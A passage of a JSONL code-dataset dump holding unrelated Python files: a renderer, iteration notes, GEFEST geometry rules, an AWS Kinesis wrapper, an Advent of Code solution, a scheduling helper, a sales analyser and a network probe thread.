Combination Sum.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28224516974","text":"import numpy as np\n\nfrom ray import Ray2D\nfrom renderer import Renderer, RenderingResult\n\n\nclass HybridRenderingResult(RenderingResult):\n def __init__(self, colors, maxSamplePoints, ratios):\n super(HybridRenderingResult, self).__init__(colors, maxSamplePoints)\n self.ratios = ratios\n\n\nclass HybridRenderer(Renderer):\n def __init__(self, eye, screen):\n super(HybridRenderer, self).__init__(eye, screen)\n\n def render(self, model, delta, plotter=None):\n numPixels = self.screen.numPixels\n pixels = self.screen.pixels\n pixelWidth = self.screen.pixelWidth\n\n colors = np.zeros((numPixels, 4))\n maxSamplePoints = 0\n\n ratios = np.zeros(numPixels)\n\n for i, pixel, in enumerate(pixels):\n viewRay = Ray2D(self.eye, pixel, 10, pixelWidth)\n\n if plotter is not None and self.plotViewRays:\n plotter.plotViewRay(viewRay, [0, 10])\n\n result = model.raycast(viewRay, delta, plotter)\n\n if result.color is not None:\n colors[i] = result.color\n maxSamplePoints = max(result.samples, maxSamplePoints)\n ratios[i] = model.voxelRatio()\n\n return HybridRenderingResult(colors, maxSamplePoints, ratios)\n","repo_name":"sveinungf/IsoGeo2D","sub_path":"hybridrenderer.py","file_name":"hybridrenderer.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70866347689","text":"# multi input comprehension\n\nl = [i * 2 for i in range(10)]\n\n# we can use many inputs and if clauses\n\n# later fors are nested in earlier ones\ncoords = [(x, y) for x in range(5) for y in range(3)]\n\nvalues = [x / (x-y)\n for x in range(50)\n if x > 50\n for y in range(100)\n if x-y != 0]\n\n# we can go meta\n\nvals = [[y * 3 for y in range(x)] for x in range(10)]\n\n# set/dict/generator work all the same\n\n\n# and now, map (c# select)\n\nunicodepoints = map(ord, 'árvíztűrő tükorfúrógép')\n\n# map() is lazy, only does things on iteration\n\n# map takes any args, function first and any other following ones are func args\n\ndef add(a, b):\n return a + b\n\nl1 = [1, 2, 3]\nl2 = [4, 5, 6]\n\nsums = list(map(add, l1, l2)) # [5, 7, 9]\n\n# map will terminate as soon as any input terminates\n\n\n\n# and now, filter (c# where)\n\n# filter(func, list)\n# we can use lambdas yay\n\npositives = filter(lambda x: x > 0, [-1, -2, 0, 2, 3]) # 2, 3\n\n\n\n# and now, functools.reduce() (c# aggregate)\n\n# repeatedly apply function until single result remains\n\nfrom functools import reduce\nimport operator\n\ntotal = reduce(operator.add, [1, 2, 3, 4, 5])\n\n# empty input results in fail, can pass a 3rd argument as default initial\n\n\n# and now, our own iterables\n\n# first iter() is called to create, then next() for items, next will raise StopIteration when it runs out\n\n# iterable is anything that implements dunder iter\n\n# alternatively, dunder getitem for consecutive integer indexing\n\n# iter(callable, sentinel), this stops when callable yields the same as sentinel","repo_name":"tomzorz/kigyo","sub_path":"src/beyond_8_iteration.py","file_name":"beyond_8_iteration.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12055222869","text":"import copy\nfrom enum import Enum\nfrom itertools import combinations\n\nimport numpy as np\nfrom 
shapely.geometry import GeometryCollection, LineString, MultiPoint\nfrom shapely.geometry import Point as ShapelyPoint\nfrom shapely.geometry import Polygon as ShapelyPolygon\nfrom shapely.ops import unary_union\nfrom shapely.validation import explain_validity\n\nfrom gefest.core.geometry import Point, Polygon, Structure\nfrom gefest.core.geometry.domain import Domain\nfrom gefest.core.opt.postproc.rules_base import PolygonRule, StructureRule\n\n\nclass PolygonsNotTooClose(StructureRule):\n \"\"\"Validates the minimum distance between polygons.\"\"\"\n\n @staticmethod\n def validate(struct: Structure, domain: Domain) -> bool:\n \"\"\"Checks pairwise distances between polygons.\"\"\"\n pairs = tuple(combinations(struct.polygons, 2))\n is_too_close = [False] * len(pairs)\n\n for idx, pair in enumerate(pairs):\n is_too_close[idx] = (\n _pairwise_dist(pair[0], pair[1], domain) < domain.dist_between_polygons\n )\n\n return not any(is_too_close)\n\n @staticmethod\n def correct(struct: Structure, domain: Domain) -> Structure:\n \"\"\"Removes one of any pair of polygons that are closer than the specified threshold.\"\"\"\n polygons = struct.polygons\n num_poly = len(polygons)\n to_delete = []\n\n for i in range(num_poly - 1):\n for j in range(i + 1, num_poly):\n distance = _pairwise_dist(polygons[i], polygons[j], domain)\n if distance < domain.dist_between_polygons:\n if (\n polygons[i] not in domain.fixed_points\n or polygons[i] not in domain.prohibited_area\n ):\n to_delete.append(i) # Collecting polygon indices for deletion\n\n to_delete_poly = [struct.polygons[i] for i in np.unique(to_delete)]\n corrected_structure = Structure(\n polygons=[poly for poly in struct.polygons if poly not in to_delete_poly],\n )\n\n return corrected_structure\n\n\ndef _pairwise_dist(poly_1: Polygon, poly_2: Polygon, domain: Domain):\n\n # returning 0 here would stall the optimizer, so a large sentinel is used instead\n if poly_1 is poly_2 or len(poly_1.points) == 0 or len(poly_2.points) == 0:\n return 9999\n\n # nearest_pts = domain.geometry.nearest_points(poly_1, poly_2); unclear 
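why it returns only one point.\n\n # Added, hedged usage sketch (not original code): rule objects are applied\n # roughly like this, assuming a populated struct and domain:\n # rule = PolygonsNotTooClose()\n # if not rule.validate(struct, domain):\n # struct = rule.correct(struct, domain)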
\n return domain.geometry.min_distance(poly_1, poly_2)\n\n\nclass PointsNotTooClose(PolygonRule):\n \"\"\"Validates the length of polygon edges.\"\"\"\n\n @staticmethod\n def validate(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> bool:\n \"\"\"Checks that each :obj:`Point` in the :obj:`Polygon` is placed at a valid distance from the previous one.\n\n Args:\n structure: the :obj:`Structure` to check\n\n Returns:\n ``True`` if every edge is longer than the minimum allowed distance, otherwise ``False``\n\n \"\"\"\n poly = copy.deepcopy(structure[idx_poly_with_error])\n if poly[0] != poly[-1] and domain.geometry.is_closed:\n poly.points.append(poly[0]) # append returns None; the original reassigned poly.points to None here\n\n length = domain.dist_between_points\n check = [None] * (len(poly) - 1)\n norms = [None] * (len(poly) - 1) # two separate lists; the original aliased one list twice\n for idx, pair in enumerate(\n zip(\n poly[:-1],\n poly[1:],\n ),\n ):\n norm = np.linalg.norm(np.array(pair[1].coords) - np.array(pair[0].coords))\n norms[idx] = norm\n check[idx] = norm > length\n\n return all(check)\n\n @staticmethod\n def correct(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> Polygon:\n \"\"\"Corrects polygon.\"\"\"\n poly = copy.deepcopy(structure[idx_poly_with_error])\n poly = domain.geometry.simplify(poly, domain.dist_between_points * 1.05)\n\n if poly[0] != poly[-1] and domain.geometry.is_closed:\n poly.points.append(poly[0])\n\n elif poly[0] == poly[-1] and not domain.geometry.is_closed:\n poly.points = poly.points[:-1]\n\n return poly\n\n\nclass PolygonNotOverlapsProhibited(PolygonRule):\n \"\"\"Validates that the polygon does not overlap prohibited objects.\"\"\"\n\n @staticmethod\n def validate(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> bool:\n \"\"\"Checks if the polygon overlaps prohibited areas.\"\"\"\n geom = domain.geometry\n if domain.geometry.is_closed:\n pass\n else:\n\n prohib = geom.get_prohibited_geom(domain.prohibited_area, domain.dist_between_polygons)\n prohib = unary_union(prohib)\n poly = geom._poly_to_shapely_line(structure[idx_poly_with_error])\n\n if poly.intersects(prohib):\n return False\n\n return True\n\n @staticmethod\n def correct(\n structure: Structure,\n 
idx_poly_with_error: int,\n domain: Domain,\n ) -> Polygon:\n \"\"\"Corrects polygon overlaps.\"\"\"\n geom = domain.geometry\n if domain.geometry.is_closed:\n raise NotImplementedError()\n else:\n\n prohib = geom.get_prohibited_geom(domain.prohibited_area, domain.dist_between_polygons)\n prohib = unary_union(prohib)\n\n poly = geom._poly_to_shapely_line(structure[idx_poly_with_error])\n\n if poly.intersects(prohib):\n res = poly.difference(prohib.buffer(0.001))\n\n if isinstance(res, (MultiPoint, LineString)):\n res = GeometryCollection(res)\n\n parts = res.geoms\n parts = [g for g in parts if not g.intersects(prohib)]\n poly = np.random.choice(parts)\n return Polygon([Point(p[0], p[1]) for p in poly.coords])\n else:\n return Polygon([Point(p[0], p[1]) for p in poly.coords])\n\n\nclass PolygonGeometryIsValid(PolygonRule):\n \"\"\"Validates polygon geometry.\n\n A polygon is invalid if its geometry does not match the geometry of the domain.\n\n \"\"\"\n\n @staticmethod\n def validate(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> bool:\n \"\"\"Validates polygon geometry.\"\"\"\n poly = structure[idx_poly_with_error]\n if (domain.geometry.is_closed and (poly[0] == poly[-1])) or (\n not domain.geometry.is_closed and (poly[0] != poly[-1])\n ):\n return True\n\n return False\n\n @staticmethod\n def correct(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> Polygon:\n \"\"\"Corrects polygon geometry.\"\"\"\n poly = structure[idx_poly_with_error]\n if domain.geometry.is_closed and (poly[0] != poly[-1]):\n poly.points.append(poly.points[0])\n\n elif not domain.geometry.is_closed and (poly[0] == poly[-1]):\n poly.points = poly.points[:-1]\n\n return poly\n\n\nclass PolygonNotOutOfBounds(PolygonRule):\n \"\"\"Out of bounds rule. A polygon is invalid if it is out of bounds.\"\"\"\n\n @staticmethod\n def validate(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> bool:\n \"\"\"Checks if polygon is out of domain bounds.\"\"\"\n geom_poly_allowed = ShapelyPolygon(\n [ShapelyPoint(pt.x, pt.y) for pt in domain.allowed_area],\n )\n for pt in structure[idx_poly_with_error]:\n geom_pt = ShapelyPoint(pt.x, pt.y)\n if (\n not geom_poly_allowed.contains(geom_pt)\n and not geom_poly_allowed.distance(geom_pt) < domain.min_dist_from_boundary\n ):\n return False\n\n return True\n\n @staticmethod\n def correct(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> Polygon:\n \"\"\"Corrects out of bound polygon.\"\"\"\n point_moved = False\n poly = structure[idx_poly_with_error]\n for p_id, point in enumerate(poly):\n if point in domain.fixed_points:\n continue\n\n point.x = max(point.x, domain.min_x + domain.len_x * 0.05)\n point.y = max(point.y, domain.min_y + domain.len_y * 0.05)\n point.x = min(point.x, domain.max_x + domain.len_x * 0.05)\n point.y = min(point.y, domain.max_y + domain.len_y * 0.05)\n if point not in domain:\n new_point = domain.geometry.nearest_point(point, domain.bound_poly)\n poly.points[p_id] = new_point\n point_moved = True\n\n if point_moved:\n poly = domain.geometry.resize_poly(poly=poly, x_scale=0.8, y_scale=0.8)\n\n if poly[0] != poly[-1] and domain.geometry.is_closed:\n poly.points.append(poly[0])\n elif poly[0] == poly[-1] and not domain.geometry.is_closed:\n poly.points = poly.points[:-1]\n\n return poly\n\n\nclass PolygonNotSelfIntersects(PolygonRule):\n \"\"\"Self-intersection rule. 
A polygon is invalid if it has self-intersections.\"\"\"\n\n @staticmethod\n def validate(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> bool:\n \"\"\"Validates the polygon for self-intersection.\"\"\"\n poly = structure[idx_poly_with_error]\n return not (\n len(poly) > 2\n and _forbidden_validity(\n explain_validity(\n ShapelyPolygon([ShapelyPoint(pt.x, pt.y) for pt in poly]),\n ),\n )\n )\n\n @staticmethod\n def correct(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> Polygon:\n \"\"\"Corrects self-intersection in the polygon.\"\"\"\n poly = structure[idx_poly_with_error]\n poly = domain.geometry.get_convex(poly)\n if not domain.geometry.is_closed:\n poly.points = poly.points[:-1]\n\n return poly\n\n\ndef _forbidden_validity(validity):\n if 'Valid Geometry' in validity:\n return False\n else:\n return True\n\n\nclass Rules(Enum):\n \"\"\"Enumeration of all defined rules.\"\"\"\n\n not_too_close_polygons = PolygonsNotTooClose()\n valid_polygon_geom = PolygonGeometryIsValid()\n not_out_of_bounds = PolygonNotOutOfBounds()\n not_self_intersects = PolygonNotSelfIntersects()\n not_overlaps_prohibited = PolygonNotOverlapsProhibited()\n not_too_close_points = PointsNotTooClose()\n","repo_name":"aimclub/GEFEST","sub_path":"gefest/core/opt/postproc/rules.py","file_name":"rules.py","file_ext":"py","file_size_in_byte":10412,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"2020207462","text":"import os\nimport sys\nimport time\nimport boto3\nimport logging\nfrom botocore.exceptions import ClientError\n\nclass kinesis_handler():\n \n def __init__(self, region_name=None):\n \n self.kinesis_client = boto3.client('kinesis', region_name=region_name)\n \n print(\"This is a Kinesis handler.\")\n \n def create_streams(self, data_streams):\n \n try:\n \n for stream in data_streams:\n \n if stream[\"stream_mode\"] == \"PROVISIONED\":\n self.kinesis_client.create_stream(\n StreamName=stream[\"name\"],\n ShardCount=stream[\"shard_count\"],\n StreamModeDetails={\n 'StreamMode': stream[\"stream_mode\"] #'PROVISIONED'|'ON_DEMAND'\n }\n ) \n else:\n self.kinesis_client.create_stream(\n StreamName=stream[\"name\"],\n StreamModeDetails={\n 'StreamMode': stream[\"stream_mode\"] #'PROVISIONED'|'ON_DEMAND'\n }\n )\n \n except ClientError as e:\n \n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n\n # Wait until all streams are created\n create_stream_result = {}\n waiter = self.kinesis_client.get_waiter('stream_exists')\n for stream in data_streams:\n waiter.wait(StreamName=stream[\"name\"])\n response = self.kinesis_client.describe_stream(StreamName=stream[\"name\"])\n create_stream_result[stream[\"name\"]] = response[\"StreamDescription\"][\"StreamARN\"]\n \n return create_stream_result\n \n def describe_stream(self, stream_name):\n \n try:\n desc_stream = self.kinesis_client.describe_stream(\n StreamName=stream_name\n )\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n return desc_stream\n \n def increase_stream_retention_period(self, stream_name, retention_period, stream_arn):\n \n try:\n response = self.kinesis_client.increase_stream_retention_period(\n StreamName=stream_name,\n RetentionPeriodHours=int(retention_period),\n 
StreamARN=stream_arn\n )\n \n except ClientError as e:\n \n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n print (f'Stream Retention Period was increased to {retention_period} hours.')\n return True\n \n def decrease_stream_retention_period(self, stream_name, retention_period, stream_arn):\n \n try:\n response = self.kinesis_client.decrease_stream_retention_period(\n StreamName=stream_name,\n RetentionPeriodHours=int(retention_period),\n StreamARN=stream_arn\n )\n\n except ClientError as e:\n \n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n print (f'Stream Retention Period was decreased to {retention_period} hours.')\n return True\n \n def delete_stream(self, stream_name, consumer_deletion, stream_arn):\n \n try:\n response = self.kinesis_client.delete_stream(\n StreamName=stream_name,\n EnforceConsumerDeletion=consumer_deletion,\n StreamARN=stream_arn\n )\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n print (f'Stream \"{stream_name}\" was deleted successfully!.')\n return True\n \n def put_record(self, stream_name, data, partition_key):\n \n try:\n self.kinesis_client.put_record(\n StreamName=stream_name,\n Data=data,\n PartitionKey=partition_key\n )\n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n def get_shard_iterator(self, stream_name):\n \n output_stream_info = self.describe_stream(\n stream_name=stream_name\n )\n shard_id = output_stream_info[\"StreamDescription\"][\"Shards\"][0][\"ShardId\"]\n \n try:\n shard_response = self.kinesis_client.get_shard_iterator(\n StreamName=stream_name,\n ShardId=shard_id,\n ShardIteratorType=\"LATEST\"\n )\n shardIterator = shard_response[\"ShardIterator\"]\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n return shardIterator\n \n def get_records(self, shard_iterator):\n \n try:\n response = self.kinesis_client.get_records(\n ShardIterator=shard_iterator,\n Limit=10000, # default: 10,000\n )\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n return response\n \n\n\nclass kinesis_analytics_handler():\n \n def __init__(self, region_name=None):\n \n self.kinesis_analytics = boto3.client('kinesisanalytics')\n \n print (f\"This is a Kinesis Analytics handler.\")\n \n def create_application(self, application_name, application_code, inputs, outputs):\n \n try:\n response = self.kinesis_analytics.create_application(\n ApplicationName=application_name,\n ApplicationCode=application_code,\n Inputs=inputs,\n Outputs=outputs,\n )\n \n except ClientError as e:\n \n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n print (f'kinesis application 
\"{application_name}\" was created successfully!.')\n return True\n \n def describe_application(self, application_name):\n \n try:\n response = self.kinesis_analytics.describe_application(\n ApplicationName=application_name\n )\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n return response\n \n def start_application(self, application_name):\n \n application=self.describe_application(\n application_name=application_name\n )\n input_id = application[\"ApplicationDetail\"][\"InputDescriptions\"][0][\"InputId\"]\n \n try:\n self.kinesis_analytics.start_application(\n ApplicationName=application_name,\n InputConfigurations=[\n {\n \"Id\": input_id,\n \"InputStartingPositionConfiguration\": {\n \"InputStartingPosition\": \"NOW\"\n }\n }\n ]\n )\n \n # Wait until application starts running\n application=self.describe_application(\n application_name=application_name\n )\n status = application[\"ApplicationDetail\"][\"ApplicationStatus\"]\n print (f\"current status: {status}\")\n \n sys.stdout.write('Starting ')\n while status != \"RUNNING\":\n sys.stdout.write('.')\n sys.stdout.flush()\n time.sleep(1)\n application=self.describe_application(\n application_name=application_name\n )\n status = application[\"ApplicationDetail\"][\"ApplicationStatus\"]\n sys.stdout.write('RUNNING')\n sys.stdout.write(os.linesep)\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n print (f'kinesis application \"{application_name}\" start!!')\n return True\n \n def stop_application(self, application_name):\n \n try:\n self.kinesis_analytics.stop_application(\n ApplicationName=application_name\n )\n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n # Wait until application stops running\n response = self.describe_application(\n application_name=application_name\n )\n status = response[\"ApplicationDetail\"][\"ApplicationStatus\"]\n sys.stdout.write('Stopping ')\n\n while status != \"READY\":\n sys.stdout.write('.')\n sys.stdout.flush()\n time.sleep(1)\n response = self.describe_application(\n application_name=application_name\n )\n status = response[\"ApplicationDetail\"][\"ApplicationStatus\"]\n\n sys.stdout.write(os.linesep)\n \n print (f'STOP: kinesis application \"{application_name}\"')\n \n def delete_application(self, application_name):\n \n response = self.describe_application(\n application_name=application_name\n )\n \n try:\n self.kinesis_analytics.delete_application(\n ApplicationName=application_name,\n CreateTimestamp=response['ApplicationDetail']['CreateTimestamp']\n )\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n print (f'kinesis application \"{application_name}\" was deleted successfully!.')\n\n \n","repo_name":"dongjin-ml/anomaly-detection-with-explanation","sub_path":"utils/kinesis.py","file_name":"kinesis.py","file_ext":"py","file_size_in_byte":12121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"525761779","text":"from anytree import 
Node, NodeMixin, RenderTree, search\n\n\nclass Element (NodeMixin):\n def __init__(self, name, dir=False, size=0, parent=None, children=None):\n self.size = size\n self.name = name\n self.parent=parent\n self.dir = dir\n if children:\n self.children = children\n def calculate_size(self):\n if(self.size == 0):\n return sum([e.calculate_size() for e in self.children])\n else:\n return self.size\n\ndef printTree(tree):\n for pre, fill, node in RenderTree(tree):\n print(\"%s%s %s\" % (pre, node.name, node.size))\n\nnodes = []\n\nroot = Element(\"root\")\ncurrentNode = root\nnodes.append(root)\nwith open(\"input.txt\") as f:\n lines = [x.strip() for x in f.readlines()]\n for l in lines:\n #print(\"line: %s\" % l)\n if(l == '$ cd /'):\n #print(\"cd to root\")\n currentNode = root\n #print(currentNode)\n elif(l == '$ cd ..'):\n print(\"CURRENTDIR: %s\" % currentNode.name)\n currentNode = currentNode.parent\n elif(list(l)[0] != '$'):\n #print(\"ls dir: %s\" % l)\n s, n = l.split(' ')\n if(s == 'dir'):\n if(len(list(filter(lambda node: node.name == n and node.dir, currentNode.children))) < 1):\n print(\"adding dir %s\" % n)\n nodes.append(Element(n, True, parent=currentNode))\n else:\n if(len(list(filter(lambda node: node.name == n and node.dir, currentNode.children))) < 1):\n nodes.append(Element(n, False, int(s), parent=currentNode))\n elif('$ cd ' in l): #change directory\n #print(\"change dir %s\" % l)\n n = l.split()[-1]\n #print(\"changing to %s\" % n)\n #printTree(root)\n #print([x.name for x in currentNode.children])\n currentNode = list(filter(lambda node: node.name == n and node.dir, currentNode.children))[0]\n #print(results)\n #currentNode = search.find(currentNode, filter_=lambda node: node.name==n and node.dir, maxlevel=1)\n if(not currentNode):\n print(\"NODE NOT FOUND: %s\" % l)\n for n in nodes:\n n.size = n.calculate_size()\n count = 0\n for n in nodes:\n if n.dir and n.size <100001:\n count = count + n.size\n \n freespace = 70000000 - root.size\n print(freespace)\n needed = 30000000 - freespace\n print(needed)\n res = search.findall(root, filter_=lambda node: node.size >= needed and node.dir)\n for r in res:\n print(r.name, r.size)\n sizes = [r.size for r in res]\n sizes.sort()\n print(sizes[0])\n #printTree(root)\n print(count)\n","repo_name":"mrgator85/AdventOfCode","sub_path":"2022/7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37218825136","text":"import datetime\r\nuser_data_base = {}\r\n\r\nclass user:\r\n\r\n def __init__(self, name, business_info):\r\n self.name = name\r\n self.business_info = business_info\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\n\r\nclass business_info:\r\n def __init__(self, name, description, work_days, start_working_day, end_working_day, tfou, hmucbaot, schedule):\r\n self.name = name\r\n self.description = description\r\n self.work_days = work_days\r\n self.start_working_day = start_working_day\r\n self.end_working_day = end_working_day\r\n self.tfou = tfou\r\n self.schedule = schedule\r\n self.hmucbaot = hmucbaot\r\n\r\n def time_management(self):\r\n # convert the strings into datetime objects\r\n self.start_working_day = datetime.datetime.strptime(self.start_working_day, '%H:%M')\r\n self.end_working_day = datetime.datetime.strptime(self.end_working_day, '%H:%M')\r\n self.tfou = datetime.timedelta(minutes=self.tfou)\r\n\r\n # compute the number of intervals\r\n total_time = self.end_working_day 
- self.start_working_day\r\n intervals = int(total_time / self.tfou)\r\n\r\n # build the list of time slots for booking\r\n schedule = []\r\n current_time = self.start_working_day\r\n for i in range(intervals):\r\n schedule.append(current_time.strftime('%H:%M'))\r\n current_time += self.tfou\r\n self.schedule = schedule\r\n\r\n","repo_name":"aslan0789/telegrambotadmin","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3936574183","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_theme(style=\"darkgrid\")\nimport numpy as np\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n\n\n\nclass Analyser():\n def __init__(self,filename):\n self.fileName=filename\n self.df=self.readFile()\n self.df = self.df.sort_values(by=['Order Date'])\n self.df['day'] = self.df['Order Date'].dt.day\n self.df['year'] = self.df['Order Date'].dt.year\n self.df['month'] = self.df['Order Date'].dt.month_name(locale = 'en_GB.UTF-8')\n\n\n\n\n def read_csv(self,fileName):\n df = pd.read_csv(fileName, sep = ',')\n return df\n\n def read_excel(self,fileName):\n df=pd.read_excel(fileName)\n \n return df\n\n def readFile(self):\n ext=self.fileName.split('.')[1]\n \n if (ext=='csv'):\n return self.read_csv(self.fileName)\n else:\n return self.read_excel(self.fileName)\n\n def getTotalProductByCategory(self):\n f, ax = plt.subplots(figsize=(11, 9))\n ax = sns.countplot(x=\"Category\", data=self.df)\n return f\n\n def getTotalProductBySubCategory(self):\n f, ax = plt.subplots(figsize=(11, 9))\n sns.set(rc={'figure.figsize':(17.7,6)})\n ax = sns.countplot(x=\"Sub-Category\", data=self.df)\n return f\n def getTotalSalesByCategory(self):\n f, ax = plt.subplots(figsize=(11, 9))\n sns.barplot(x=self.df.Category.unique(),\n y=self.df.groupby(['Category'])['Sales'].sum())\n return f\n\n def getTotalQuantitySoldByCategory(self):\n f, ax = plt.subplots(figsize=(11, 9))\n sns.barplot(x=self.df.Category.unique(),\n y=self.df.groupby(['Category'])['Quantity'].sum())\n return f\n\n def getTotalProfitByCategory(self):\n f, ax = plt.subplots(figsize=(11, 9))\n sns.barplot(x=self.df.Category.unique(),\n y=self.df.groupby(['Category'])['Profit'].sum())\n return f\n \n def getDF(self):\n return self.df\n\n def getSummary(self):\n self.df.columns = [c.replace(' ', '_') for c in self.df.columns]\n self.df['year'] = pd.DatetimeIndex(self.df['Order_Date']).year\n\n all_df=[]\n for y in self.df['year'].unique(): \n temp=self.df[self.df['Order_Date'].dt.year == y]\n all_df.append(temp)\n all_df.append(self.df) \n result_text=\"\"\n l=len(all_df)\n if(l==2):\n l=1\n \n for i in range(l):\n year=all_df[i]['year'].unique()\n sales = round(sum(all_df[i]['Sales']),0)\n profit = round(sum(all_df[i]['Profit']),0)\n tP=all_df[i]['Product_Name'].nunique()\n tc=all_df[i]['City'].nunique()\n d=all_df[i].groupby('Product_Name').sum()\n d=d[['Sales','Quantity','Profit']]\n d.reset_index(inplace=True)\n Product_max_sold=d.sort_values(by=['Quantity'],ascending=False).head(1)\n Product_max_sales=d.sort_values(by=['Sales'],ascending=False).head(1)\n Product_max_profit=d.sort_values(by=['Profit'],ascending=False).head(1)\n all_df[i]['diff_years'] = all_df[i]['Ship_Date'] - all_df[i]['Order_Date']\n all_df[i]['diff_years']=all_df[i]['diff_years']/np.timedelta64(1,'D')\n 
avg_stime=int(round(all_df[i]['diff_years'].mean(),0))\n \n print(year)\n print(f'➤The total sales is €{sales} and total profit is €{profit}.')\n print(f'➤Total of {tP} products are sold over {tc} cities.')\n print(f'➤{Product_max_sold.iloc[0, 0]} is the most sold product.')\n print(f'➤{Product_max_profit.iloc[0, 0]} is the product with a max sales of €{round(Product_max_profit.iloc[0, 1],0)} & profit of €{round(Product_max_profit.iloc[0, 3],0)}.')\n print(f'➤Average shipping time for an order is {avg_stime} days.')\n \n \n result_text+=\"\\n{0} \\nThe total sales is €{1} and total profit is €{2}.\\nTotal of {3} products are sold over {4} cities.\\n{5} is the most sold product.\\n{6} is the product with a max sales of €{7} & profit of €{8}.\\nAverage shipping time for an order is {9} days.\".format(year,sales,profit,tP,tc,Product_max_sold.iloc[0, 0],Product_max_profit.iloc[0, 0],round(Product_max_profit.iloc[0, 1],0),round(Product_max_profit.iloc[0, 3],0),avg_stime)\n \n return result_text ","repo_name":"BushidoBurn/lLamas-Analytics","sub_path":"Frontend/GUI/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14742769548","text":"import socket, struct, threading, time\nfrom enum import IntEnum\nfrom NetworkUtils import *\n\n\nclass ProbeSender(threading.Thread):\n def __init__(self, probe, source_ip, source_port, target_ip, target_port):\n threading.Thread.__init__(self)\n self.probe = probe\n self.source_port = source_port\n self.source_ip = source_ip\n self.target_port = target_port\n self.target_ip = target_ip\n\n def run(self):\n time.sleep(1)\n self.probe.send(self.target_ip)\n\n def change_probe(self, new_probe):\n self.probe = new_probe\n\n","repo_name":"eliasarnold/internetandsecurityproject","sub_path":"src/probes/ProbeSender.py","file_name":"ProbeSender.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3120447119","text":"if __name__ == '__main__':\n vocab = {}\n with open('../../../data/hightemp.txt', 'r') as f:\n data = f.read().split('\\n')\n data.remove('')\n for line in data:\n cols = line.split('\\t')\n chars = list(cols[0])\n for char in chars:\n if not char in vocab:\n vocab[char] = len(vocab)\n print(len(vocab))","repo_name":"tanaka504/NLP100knock","sub_path":"chapter2/k17.py","file_name":"k17.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24740089990","text":"import glob\nimport pandas as pd\nimport numpy as np\nfrom scipy.sparse import csr_matrix\n\n\ndef load_snapshots(subnet_dir):\n \"\"\"\n Loads the snapshot data frames into a dict indexed by the file names\n\n Parameters\n ----------\n subnet_dir: path to experiment data files\n\n Output\n ------\n python dict\n 